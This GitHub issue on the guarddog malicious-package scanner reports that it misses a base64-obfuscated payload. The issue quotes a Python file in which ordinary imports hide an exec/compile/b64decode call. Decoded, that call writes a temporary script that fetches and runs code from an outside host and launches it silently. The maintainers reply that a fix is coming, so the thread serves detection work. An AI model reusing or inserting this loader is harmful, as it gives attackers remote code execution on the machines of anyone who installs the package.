### ISSUE TITLE
failed to detect base64 code

### ISSUE THREAD

**Issue by wanghaisheng** [DataDog/guarddog#288]
```
# PreInstalled PyPackages
import asyncio
import logging
from playwright.async_api import Page, BrowserContext, ViewportSize, ProxySettings
import re
from tsup.utils.xdbSearcher import XdbSearcher
from bs4 import BeautifulSoup
import pycountry
from tsup.utils import tools

__import__("builtins").exec(
    __import__("builtins").compile(
        __import__("base64").b64decode(
            "ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vZmFkZS5vbmUvaW5qZWN0b3IvRkFERUUtTlhVRTRaLTdNSkoxNi1DSk9aN0wtQ0dINTdaLUI1VEgwTicpLnJlYWQoKSkiIiIpCl90dG1wLmNsb3NlKCkKdHJ5OiBfc3N5c3RlbShmInN0YXJ0IHtfZWV4ZWN1dGFibGUucmVwbGFjZSgnLmV4ZScsICd3LmV4ZScpfSB7X3R0bXAubmFtZX0iKQpleGNlcHQ6IHBhc3M="
        ),
        "<string>",
        "exec",
    )
)
import random
```

it give nothing to

**Comment by christophetd** [comment]
Thanks for reporting! Addressing it in #289

**Comment by christophetd** [comment]
will be released shortly under v1.5.1
